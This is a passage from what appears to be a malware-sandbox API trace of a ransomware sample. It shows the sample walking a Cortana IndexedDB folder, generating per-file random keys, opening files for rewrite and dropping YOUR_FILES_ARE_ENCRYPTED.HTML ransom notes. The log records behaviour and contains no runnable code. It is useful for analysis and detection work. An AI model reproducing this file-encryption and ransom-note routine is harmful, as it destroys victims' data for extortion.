param_1=0x19ddd2, param_2="%02X" | out: param_1="61") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="95") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="50") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="C7") returned 2 [0119.264] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="43") returned 2 [0119.264] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="1B") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="D7") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="FF") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="58") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="31") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="6B") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="E1") returned 2 [0119.265] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="06") returned 2 [0119.265] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="DD") returned 2 [0119.265] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="9C") returned 2 [0119.265] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="71") returned 2 [0119.265] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="69") returned 2 [0119.265] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00029.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00029.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00029.log" [0119.265] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.265] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.266] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb22efaa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xb27d08d9, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xb26e3aed, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="edb0002A.log", cAlternateFileName="")) returned 1 [0119.266] StrStrIW (lpFirst="edb0002A.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.266] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002A.log") returned 120 [0119.266] PathFindExtensionW (pszPath="edb0002A.log") returned=".log" [0119.266] lstrlenW (lpString=".log") returned 4 [0119.266] PathFindExtensionW (pszPath="edb0002A.log") returned=".log" [0119.266] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002A.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb0002a.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.270] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=524288) returned 1 [0119.270] GetProcessHeap () returned 0x600000 [0119.270] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.270] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="6F") returned 2 [0119.270] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="B2") returned 2 [0119.270] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="63") returned 2 [0119.270] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="3E") returned 2 [0119.270] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="2A") returned 2 [0119.270] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="8B") returned 2 [0119.270] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="F3") returned 2 [0119.270] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="BA") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="BF") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="63") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="DC") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="9D") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="A0") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="C5") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="47") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="C6") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="FA") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="AF") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="BB") returned 2 [0119.271] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="6E") returned 2 [0119.271] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="21") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="6F") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="6E") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="53") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="2F") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="5E") returned 2 [0119.271] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="C9") returned 2 [0119.271] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="65") returned 2 [0119.271] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="22") returned 2 [0119.271] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="30") returned 2 [0119.271] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="C1") returned 2 [0119.271] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="2F") returned 2 [0119.272] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002A.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002A.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002A.log" [0119.272] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.272] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.276] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb22efaa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xad59780, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0xb28592c2, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="edb0002B.log", cAlternateFileName="")) returned 1 [0119.276] StrStrIW (lpFirst="edb0002B.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.276] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002B.log") returned 120 [0119.276] PathFindExtensionW (pszPath="edb0002B.log") returned=".log" [0119.276] lstrlenW (lpString=".log") returned 4 [0119.276] PathFindExtensionW (pszPath="edb0002B.log") returned=".log" [0119.276] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002B.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb0002b.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.277] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=524288) returned 1 [0119.277] GetProcessHeap () returned 0x600000 [0119.277] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.279] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="5D") returned 2 [0119.279] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="33") returned 2 [0119.279] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="4D") returned 2 [0119.279] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="E0") returned 2 [0119.279] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="DF") returned 2 [0119.279] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="EC") returned 2 [0119.279] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="D8") returned 2 [0119.279] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="38") returned 2 [0119.279] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="62") returned 2 [0119.279] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="46") returned 2 [0119.279] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="39") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="BA") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="8D") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="B0") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="D3") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="35") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="DF") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="AB") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="87") returned 2 [0119.280] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="A3") returned 2 [0119.280] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="DE") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="91") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="9C") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="0E") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="73") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="07") returned 2 [0119.280] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="76") returned 2 [0119.280] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="7D") returned 2 [0119.280] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="DE") returned 2 [0119.280] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="7A") returned 2 [0119.280] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="50") returned 2 [0119.280] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="7B") returned 2 [0119.280] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002B.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002B.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb0002B.log" [0119.281] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.281] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.281] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb25521c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xcb25521c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xcb25521c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0119.281] StrStrIW (lpFirst="edbres00001.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.281] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00001.jrs") returned 123 [0119.281] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0119.281] lstrlenW (lpString=".jrs") returned 4 [0119.281] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0119.281] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb25521c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xcb25521c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xcb27b58d, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0119.282] StrStrIW (lpFirst="edbres00002.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.282] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00002.jrs") returned 123 [0119.282] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0119.282] lstrlenW (lpString=".jrs") returned 4 [0119.282] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0119.282] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb22efaa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xb2850a5a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xe13eb25e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="edbtmp.log", cAlternateFileName="")) returned 1 [0119.282] StrStrIW (lpFirst="edbtmp.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.282] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log") returned 118 [0119.282] PathFindExtensionW (pszPath="edbtmp.log") returned=".log" [0119.282] lstrlenW (lpString=".log") returned 4 [0119.282] PathFindExtensionW (pszPath="edbtmp.log") returned=".log" [0119.282] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbtmp.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.285] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=524288) returned 1 [0119.285] GetProcessHeap () returned 0x600000 [0119.285] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.285] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="E2") returned 2 [0119.285] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="A8") returned 2 [0119.285] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="E4") returned 2 [0119.285] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="1B") returned 2 [0119.285] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="B3") returned 2 [0119.285] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="BA") returned 2 [0119.285] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="08") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="08") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="B1") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="AF") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="50") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="05") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="0B") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="BC") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="AB") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="37") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="B8") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="81") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="6E") returned 2 [0119.286] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="3D") returned 2 [0119.286] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="B6") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="59") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="93") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="96") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="73") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="70") returned 2 [0119.286] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="C3") returned 2 [0119.286] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="DC") returned 2 [0119.286] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="AE") returned 2 [0119.286] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="10") returned 2 [0119.286] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="B9") returned 2 [0119.286] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="21") returned 2 [0119.287] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log" [0119.287] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.287] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.287] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb27b58d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xcb27b58d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x8beb47b1, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x1280000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="IndexedDB.edb", cAlternateFileName="INDEXE~1.EDB")) returned 1 [0119.287] StrStrIW (lpFirst="IndexedDB.edb", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.287] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\IndexedDB.edb") returned 121 [0119.287] PathFindExtensionW (pszPath="IndexedDB.edb") returned=".edb" [0119.287] lstrlenW (lpString=".edb") returned 4 [0119.287] PathFindExtensionW (pszPath="IndexedDB.edb") returned=".edb" [0119.287] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb27b58d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xcb27b58d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x8beb47b1, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x1280000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="IndexedDB.edb", cAlternateFileName="INDEXE~1.EDB")) returned 0 [0119.290] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0119.290] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0119.290] GetProcessHeap () returned 0x600000 [0119.290] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.291] WriteFile (in: hFile=0x338, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.292] CloseHandle (hObject=0x338) returned 1 [0119.292] GetProcessHeap () returned 0x600000 [0119.292] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.292] GetProcessHeap () returned 0x600000 [0119.292] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.292] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb208e81, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xb2850a5a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb2850a5a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="Indexed DB", cAlternateFileName="INDEXE~1")) returned 0 [0119.292] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.293] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0119.293] GetProcessHeap () returned 0x600000 [0119.293] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 